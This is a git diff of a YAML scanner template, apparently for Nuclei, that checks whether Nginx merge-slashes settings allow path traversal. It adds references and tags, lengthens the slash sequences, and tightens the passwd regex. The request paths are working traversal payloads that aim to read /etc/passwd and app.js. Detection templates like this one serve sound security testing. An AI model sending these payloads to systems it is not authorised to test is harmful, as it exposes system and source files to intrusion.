--- a/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
+++ b/vulnerabilities/other/nginx-merge-slashes-path-traversal.yaml
@@ -4,21 +4,24 @@ info:
   name: Nginx Merge Slashes Path Traversal
   author: dhiyaneshDk
   severity: medium
-  reference: https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
-  tags: exposure,config
+  reference: |
+        - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/nginx-merge-slashes-path-traversal.json
+        - https://medium.com/appsflyer/nginx-may-be-protecting-your-applications-from-traversal-attacks-without-you-even-knowing-b08f882fd43d
+  tags: exposure,config,lfi,nginx
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}//////../../../etc/passwd"
-      - "{{BaseURL}}/static//////../../../../etc/passwd"
+      - "{{BaseURL}}///////../../../etc/passwd"
+      - "{{BaseURL}}/static///////../../../../etc/passwd"
       - "{{BaseURL}}///../app.js"
 
     matchers-condition: and
     matchers:
-      - type: word
-        words:
-          - "root:"
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0:"
           - "app.listen"
         part: body
         condition: or
